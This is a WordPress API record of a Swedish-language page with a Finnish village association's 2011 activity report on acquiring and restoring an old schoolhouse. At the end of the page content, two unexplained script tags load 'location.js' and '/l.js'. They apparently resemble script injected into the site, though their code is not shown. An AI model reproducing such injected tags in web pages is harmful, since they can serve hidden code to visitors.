{"id":998,"date":"2012-03-13T11:28:07","date_gmt":"2012-03-13T09:28:07","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=998"},"modified":"2012-03-13T11:28:07","modified_gmt":"2012-03-13T09:28:07","slug":"gfv-verksamhetsberattelse-2011","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/gfv-arsmote-2012\/gfv-verksamhetsberattelse-2011\/","title":{"rendered":"GFV Verksamhetsber\u00e4ttelse 2011"},"content":{"rendered":"<div>\n<p>Gamla Folkskolans v\u00e4nner i Hindersby r.f<\/p>\n<p>Verksamhetsber\u00e4ttelse \u00a0f\u00f6r \u00e5r 2011<\/p>\n<p>Grundande medlemmar: Nisse Husberg, Gun-Britt Husberg, Inga Vickholm, Berit Husberg och G\u00f6ran Wall\u00e9n.<\/p>\n<p>Den 3.4 startades f\u00f6reningen av Nisse Husberg efter att det blev klart att kommunen skulle kunna t\u00e4nka sig att s\u00e4lja gamla folkskolan till f\u00f6rening, n\u00e4rmast p\u00e5 grund av att tomten som skolan st\u00e5r p\u00e5 \u00e4r en allm\u00e4nning som \u00e4gs av byborna.<\/p>\n<p>I all hast grundades f\u00f6reningen och anh\u00e5llan om registrering s\u00e4ndes iv\u00e4g till Patent och registerstyrelsen.<\/p>\n<p>Den 4.4 s\u00e4ndes iv\u00e4g ett anbud \u00a0till Lapptr\u00e4sk kommun om att f\u00e5 k\u00f6pa huset f\u00f6r beskattningsv\u00e4rdet. En summa p\u00e5 500\u20ac.<\/p>\n<p>Den 9.5 besl\u00f6t kommunstyrelsen \u00a0att ge huset som g\u00e5va till f\u00f6reningen.<\/p>\n<p>F\u00f6rsta styrelsem\u00f6tet h\u00f6lls den 18.5 2011. P\u00e5 m\u00f6tet gicks rundvandring i huset och det diskuterades om vatten, v\u00e4rme och elsystem. Det besl\u00f6ts att vi inv\u00e4ntar registreringen och g\u00e5vobrevet. Det besl\u00f6ts att vi kan b\u00f6rja ta emot medlemsans\u00f6kningar till f\u00f6reningen. Ans\u00f6kningarna skall godk\u00e4nnas av styrelsen enligt stadgarna.<\/p>\n<p>Vako meddelade att dom inte beh\u00f6ver l\u00e4genheten f\u00f6r kursverksamhet men vattnet \u00e4r avst\u00e4ngt p\u00e5 den sidan p\u00e5 grund av att vattenledningarna \u00e4r ben\u00e4gna att frysa.<\/p>\n<p>D\u00e5 besl\u00f6ts att \u00e5rsm\u00f6tet skulle h\u00e5llas senare, n\u00e4rmast p\u00e5 grund av att f\u00f6reningen inte kommer in i huset f\u00f6re 30.4 2012.<\/p>\n<p>Den 20.6 2011 godk\u00e4nde Patent och registerstyrelsen registreringen av Gamla Folkskolans v\u00e4nner i Hindersby r.f med registernummer 205.931.<\/p>\n<p>Vid styrelsem\u00f6tet den 12.7 2011 konstituerades styrelsen av underskrivarna.<\/p>\n<p>Till Ordf\u00f6rande: \u00a0Nisse Husberg<br \/>\nViceordf\u00f6rande: G\u00f6ran Wall\u00e9n<br \/>\nSekreterare: Inga Vickholm<br \/>\nKass\u00f6r: Berit Husberg<br \/>\nMedlem: Gun-Britt Husberg<\/p>\n<p>Kass\u00f6ren skulle utreda om \u00f6ppnande av bankkonto i V\u00e4stra Kymmene Andelsbank.<\/p>\n<p>Planer p\u00e5 att flytta HB-Service fiberkabels v\u00e4xel till skolan diskuterades och godk\u00e4ndes.<\/p>\n<p>Planerna i det h\u00e4r skedet f\u00f6r v\u00e4rme och vattensystem \u00e4r, att hela gamla systemet skall kopplas bort fr\u00e5n barnhemmet och f\u00f6reningen bygger eget system.<\/p>\n<p>M\u00f6tet ans\u00e5g att det \u00e4r kommunens sak att koppla bort v\u00e4rme och vattenledningen fr\u00e5n barnhemmets k\u00e4llare och f\u00f6reningens sak att koppla in vattenledningen till gamla skolan.<\/p>\n<p>Ordf\u00f6rande utreder om anskaffning av v\u00e4rmepumpar d\u00e5 v\u00e4rmeledningarna kopplas bort.<\/p>\n<p>Lapptr\u00e4sk kommun hade gjort avtal med Valkon Kansallisopisto om att Vako f\u00f6rfogar \u00f6ver hela skolan till den 30 april 2012 f\u00f6r kursverksamhet.<\/p>\n<p>F\u00f6reningen avvaktade kommunens beslut. M\u00f6tet ans\u00e5g att kommunen i s\u00e5 fall skulle h\u00e5lla skolan i skick f\u00f6r Vako.<\/p>\n<p>Kommunen godk\u00e4nde detta.<\/p>\n<p>G\u00e5vobrevet hade inte heller kommit \u00e4nnu.<\/p>\n<p>Gun-Britt Husberg kartlade v\u00e4xtligheten p\u00e5 hela tomten.<\/p>\n<p>Styrelsen besl\u00f6t att \u00e5rsm\u00f6tet h\u00e5lls 2012 och ingen medlemsavgift uppb\u00e4res f\u00f6r 2011.<\/p>\n<p>M\u00f6tet besl\u00f6t att det skulle ordnas r\u00f6jnings- och krattantalko p\u00e5 allm\u00e4nningen den 30.7. Kallelse sattes i postl\u00e5dorna i Hindersby och B\u00e4ckby \u00a0och 15 personer h\u00f6rsammade kallelsen och omr\u00e5det snyggades upp.<\/p>\n<p>Jonas Mickos k\u00f6rde bort tr\u00e4d och kvistar f\u00f6r flisning s\u00e5 omr\u00e5det blev snyggt p\u00e5 en g\u00e5ng.<\/p>\n<p>Den 29.7 bes\u00f6kte Christine och \u00c5ke Grandell gamla skolan. De hade en hel del att ber\u00e4tta om tiden de sj\u00e4lva bodde h\u00e4r. De lovade att hj\u00e4lpa f\u00f6reningen att planera \u00e5terst\u00e4llningen av l\u00e4rarbostaden i m\u00e5n av m\u00f6jlighet.<\/p>\n<p>Under sommaren underhandlade ordf\u00f6rande Nisse med kommunen i olika tekniska \u00e4renden bl.a med Jouko Toropainen p\u00e5 tekniska byr\u00e5n.<\/p>\n<p>Den 14.9 h\u00f6lls styrelsem\u00f6te.<\/p>\n<p>Bankkonto \u00e5t f\u00f6reningen hade \u00f6ppnats i V\u00e4stra Kymmene Andelsbank.<\/p>\n<p>Ordf\u00f6rande hade gjort upp 3 \u00e5rs projektplan och budget f\u00f6r att f\u00f6reningen skulle kunna s\u00f6ka renoveringsbidrag fr\u00e5n Finlands Hembygdsf\u00f6rbund.<\/p>\n<p>Planerna och budgeten godk\u00e4ndes p\u00e5 m\u00f6tet.<\/p>\n<p>Den 19.9 2011 hade g\u00e5vobrevet godk\u00e4nts av kommunstyrelsen. Vid p\u00e5f\u00f6ljande styrelsem\u00f6te fick ordf\u00f6rande fullmakt av styrelsen att f\u00e4rdigst\u00e4lla ans\u00f6kan till Finlands Hembygdsf\u00f6rbund.<\/p>\n<p>Landskapsammanuens \u00a0Synn\u00f6ve Bergholm \u00a0och byggnadsforskare Juha Vuorinen fr\u00e5n Borg\u00e5 museum var p\u00e5 bes\u00f6k f\u00f6r att kartl\u00e4gga det historiska och museala v\u00e4rdet p\u00e5 huset. De gav ett skriftligt utl\u00e5tande, som bifogades till ans\u00f6kan till Finlands Hembygdsf\u00f6rbund.<\/p>\n<p>Lokalf\u00f6rs\u00e4kringsf\u00f6reningen kontaktades av Nisse f\u00f6r att f\u00f6rs\u00e4kra huset mot brand och st\u00f6ld.<\/p>\n<p>Nisse l\u00e5nade f\u00f6rs\u00e4kringssumman f\u00f6r kassan var tom.<\/p>\n<p>Stora tr\u00e4d bakom skolan s\u00e5gades bort f\u00f6r att kvistarna skrapade mot taket och \u00a0hade rivit ner takr\u00e4nnan. Gr\u00e4vningsarbetet kom ig\u00e5ng f\u00f6r fiberkabel och vattenledning mellan barnhemmet och skolan.<\/p>\n<p>Gr\u00e4vningsarbetet \u00a0betaldes av HB Service AB.<\/p>\n<p>P\u00e5 svenska dagen den 6.11 var det \u00f6ppet hus med kaffebjudning och utst\u00e4llning av Gun-Britt Husbergs projekt runt gamla v\u00e4xter som \u00e4nnu v\u00e4xer i gamla tr\u00e4dg\u00e5rdar och Nisse Husbergs\u00a0litteratur om byggnadsv\u00e5rd av gamla hus.<\/p>\n<p>Man hade m\u00f6jlighet att anh\u00e5lla om medlemskap i f\u00f6reningen. F\u00f6r att st\u00f6da f\u00f6reningen ekonomiskt s\u00e5 st\u00e4lldes en stor kaffepanna ut med en skylt \u201dStartbidrag\u201d.<\/p>\n<p>Ca 130 personer bes\u00f6kte skolan den dagen.<\/p>\n<p>Anh\u00e5llan om medlemskap \u00f6kade medlemmarna till 30.<\/p>\n<p>Christine Grandell donerade sin fars l\u00e4rare Eugen Grandells &#8221;Bonniers konversationslexikon\u201d serie och andra sk\u00f6nlitteratur-b\u00f6cker .<\/p>\n<p>Av familjen Grandell har f\u00f6reningen \u00a0f\u00e5tt l\u00e5na och kopiera gamla fotografier, som \u00e4r tagna p\u00e5 gamla skolan d\u00e4r l\u00e4rarfamiljen bodde.<\/p>\n<p>Nisse hade h\u00e4mtat m\u00f6bler till l\u00e4genheten. Fyra stolar och ett stort bord i gammal stil och f\u00f6re julen h\u00e4mtades ytterligare ett stort skrivbord och en bokhylla.<\/p>\n<p>Planerna \u00e4r att m\u00f6belstilen skall tangera l\u00e4rare Grandells under den tid familjen bodde p\u00e5 gamla skolan.<\/p>\n<p>Den 23 december satte Nisse in tv\u00e5 julstj\u00e4rnor och ledljus i f\u00f6nsterna p\u00e5 gamla skolan, och det lyste s\u00e5 fint.<\/p>\n<p>4 \u00a0styrelsem\u00f6ten har h\u00e5llits \u00a0under \u00e5ret.<\/p>\n<p>Talkotimmar har samlats 315.<\/p>\n<p>Styrelsen tackar f\u00f6r det positiva st\u00f6d i arbetet att gamla folkskolan \u00a0skall kunna bevaras i sitt ursprungliga skick f\u00f6r framtiden och kunna utnyttjas till nytta och n\u00f6je f\u00f6r skolans v\u00e4nner.<\/p>\n<p>Enligt uppdrag<br \/>\nInga Vickholm<br \/>\nsekreterare<\/p>\n<\/div>\n<p><script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gamla Folkskolans v\u00e4nner i Hindersby r.f Verksamhetsber\u00e4ttelse \u00a0f\u00f6r \u00e5r 2011 Grundande medlemmar: Nisse Husberg, Gun-Britt Husberg, Inga Vickholm, Berit Husberg och G\u00f6ran Wall\u00e9n. Den 3.4 startades f\u00f6reningen av Nisse Husberg efter att det blev klart att kommunen skulle kunna t\u00e4nka sig att s\u00e4lja gamla folkskolan till f\u00f6rening, n\u00e4rmast p\u00e5 grund av att tomten som skolan &hellip; <a href=\"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/gfv-arsmote-2012\/gfv-verksamhetsberattelse-2011\/\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dGFV Verksamhetsber\u00e4ttelse 2011\u201d<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":1004,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-998","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/998","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=998"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/998\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1004"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=998"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}